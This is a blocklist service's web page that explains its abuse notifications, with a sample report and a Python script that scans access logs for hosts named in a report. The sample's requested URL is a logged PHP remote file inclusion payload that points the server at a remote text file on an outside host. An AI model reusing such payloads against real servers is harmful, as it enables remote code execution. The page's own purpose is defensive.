Web Server Blocklist and Blacklist Information
Responsible persons listed in DNS get an email when a compromised machine attacks or attempts to abuse one of our servers. This is similar to what they will see:
Below is the IP address and type of attack recently observed and blocked on one of our web servers. The individual IP address is listed on the internet as a recommended deny for web servers or firewalls until we hear back from you that the machine in question has been fixed. Some ISP, NOC, web archive copies or lists that refer to this list may take two or more business days to reflect the removal of IP addresses.

time of request: Wednesday September 21, 2011 - 05:43:47 AM PDT
ip: 91.121.14.107
remote host: ns23561.ovh.net
user-agent string: Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)
requested url: ////?_SERVER[DOCUMENT_ROOT]=http://www.miniprice.pl/osco/grace.txt??
referer:
source port: 43925
destination port: 80

This message is generated only when attacks occur and is sent to the responsible parties listed in the DNS of the attacking IP address. Please see http://www.cruzit.com/botblock.php for more information on the fields in this message and what to do about it.
If you or your customer received this kind of message, the first thing you
should do, of course,
is take the machine listed after “ip:” off-line. A large percentage of machines
that are blocked are compromised with some sort of XSS (Cross Site Scripting) issue:
someone has injected code into your web pages so that when someone visits your page,
data gets pulled from another machine and presented (usually hidden) to that
person's browser. One thing to look for is code in your web pages, such as <iframe>
and/or <script> (JavaScript) tags, that you didn't put there. Also check your web server
and traffic logs for requests going to or coming from the machine listed in the
“requested url:” section of the report we sent to you. In the above example
you would be looking for traffic to or from “http://www.miniprice.pl/”. The referer is quite often blank.
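The log check described above, as an added example that is not part of this site's own tooling: it pulls the host out of the report's "requested url:" field and looks for it in the request and referer fields of a web server access log. It assumes the report fields arrive one per line and that the log is in combined log format; the log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Fields copied from the sample notification on this page, one per line (assumed layout).
REPORT = """\
ip: 91.121.14.107
requested url: ////?_SERVER[DOCUMENT_ROOT]=http://www.miniprice.pl/osco/grace.txt??
referer:
"""

# Constructed access-log lines (combined log format); client IPs are documentation addresses.
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Sep/2011:05:40:01 -0700] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [21/Sep/2011:05:41:12 -0700] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fwww.miniprice.pl%2Fosco%2Fgrace.txt%3F%3F HTTP/1.1" 200 90 "-" "Mozilla/4.0"',
    '192.0.2.33 - - [21/Sep/2011:05:42:30 -0700] "GET /news.php HTTP/1.1" 200 734 "http://WWW.MINIPRICE.PL/osco/" "Mozilla/5.0"',
]
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" \d{3} \S+ "([^"]*)" "[^"]*"')

def parse_report(text):
    """Split 'name: value' lines on the first colon only, so URLs in values survive."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip().lower()] = value.strip()
    return fields

def embedded_hosts(requested_url):
    """Hostnames of http(s) URLs carried inside the reported request string."""
    urls = re.findall(r'https?://[^\s"<>]+', requested_url, re.I)
    return sorted({h for h in (urlsplit(u).hostname for u in urls) if h})

def scan_log(lines, hosts):
    """Return (line number, client, field) for each log field naming a reported host."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        client, request, referer = m.groups()
        for field, value in (("request", request), ("referer", referer)):
            decoded = unquote(value).lower()  # undo %-encoding before comparing
            if any(h in decoded for h in hosts):
                hits.append((n, client, field))
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG, embedded_hosts(parse_report(REPORT)["requested url"])):
        print(hit)
```

Decoding each field before matching matters because the same host can appear percent-encoded in a query string, where a plain text search for the hostname would miss it.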
Note:
IP addresses that have been blocked and reported are also listed
on the public blacklists, one of which is HERE.
ISP, DNS, mail server and site owner personnel use these lists for blocking and/or rejecting
similar attacks on their systems using RBL-style or firewall rules such
as PeerBlock, PeerGuardian Linux, iplist, Vuze, Transmission,
uTorrent, and pfBlocker. They may not accept any traffic from
the blocked IP address.
All information on this web site is free. Most tools and some information require signing in.
The only reason for this is to prevent abuse by bots and other nefarious agents that attempt baning our tools.
Please see our easy to read Privacy Policy for more information.
Yes, baning is a real word. (From approximately 1578) Just seeing if you were paying attention.